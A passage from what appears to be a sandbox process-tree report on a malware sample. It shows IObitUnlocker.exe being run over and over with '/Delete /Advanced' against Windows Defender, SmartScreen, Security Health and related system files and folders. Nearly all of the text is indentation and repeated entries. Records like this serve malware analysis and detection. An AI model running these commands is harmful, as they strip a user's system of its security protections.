Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11364
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:12220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:11844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10596
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:11976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11352
